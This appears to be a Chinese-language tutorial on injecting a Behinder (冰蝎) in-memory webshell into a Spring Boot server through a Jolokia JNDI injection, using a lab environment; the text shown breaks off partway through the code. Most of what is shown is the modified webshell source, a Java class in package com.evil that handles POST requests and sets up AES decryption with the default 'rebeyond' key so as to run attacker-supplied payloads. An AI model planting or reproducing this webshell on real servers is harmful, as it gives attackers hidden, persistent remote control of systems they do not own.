
SpringBoot注入冰蝎内存马实践

     本文以 Spring Boot 的 Jolokia 存在 JNDI 注入为例,讲解如何向服务器注入冰蝎内存马,环境来自 SpringBootVulExploit。     首先给出改造好的冰蝎代码: package com.evil; import javax.crypto.Cipher; import javax.crypto.spec.SecretKeySpec; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import java.lang.reflect.Method; import java.util.HashMap; import java.util.Map; public class Beh{ public void index(final HttpServletRequest req, final HttpServletResponse resp) { try { if (req.getMethod().equals("POST")) { String k = "e45e329feb5d925b"; // rebeyond HttpSession session = req.getSession(); session.putValue("u", k); Cipher c = Cipher.getInstance("AES"); c.init(2, new SecretKeySpec(k.getBytes(), "AES")); final Map myPageContext = new HashMap (); myPageContext.put("